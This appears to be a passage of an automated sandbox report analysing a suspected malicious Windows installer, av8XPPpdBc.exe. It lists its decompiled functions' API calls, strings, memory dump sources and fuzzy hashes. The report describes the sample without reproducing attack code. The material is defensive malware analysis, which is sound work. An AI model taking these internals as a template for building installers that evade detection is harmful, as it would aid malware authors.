                                                                                                                                                                                      • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                                                                                                                                        • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 0040604B
                                                                                                                                                                                        • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                                                                                      • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                                                                                                                      • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                                                                                                                      • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                                                                                                                                                                      Function 00406805 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\av8XPPpdBc.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\av8XPPpdBc.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                                                                      • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • *?|<>/":, xrefs: 00406857
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
                                                                                                                                                                                      • "C:\Users\user\Desktop\av8XPPpdBc.exe", xrefs: 00406849
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\av8XPPpdBc.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                      • API String ID: 589700163-1519629447
                                                                                                                                                                                      • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                                      • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                                                                                                                                                      • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                                      • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                                                                                                                                                      Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00404598
                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 004045B0
                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004045C3
                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 004045D3
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004045ED
                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                      • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                      • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                                                                                                                                                      Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                                                                                                                        • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                      • String ID: 9
                                                                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                                                                      • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                                                                      • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                                                                      • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                                                                                                                                                      Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404EB4
                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                      • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                      • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                      • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                                                                                                                                                      Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                                                                                                                      • MulDiv.KERNEL32(000AC5B9,00000064,000AC7BD), ref: 00402FE1
                                                                                                                                                                                      • wsprintfW.USER32 ref: 00402FF1
                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 00402FEB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                      • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                                                                      • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                                                                                                                                                      Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                                                      • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                                                                                                                      • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                                                                                                                                                      Function 00405F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405EDF
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405F87
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                      • String ID: 4#v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nswE27F.tmp
                                                                                                                                                                                      • API String ID: 3248276644-1895474628
                                                                                                                                                                                      • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                                                                                                                      • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                                                                                                                                                                      Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1354259210-0
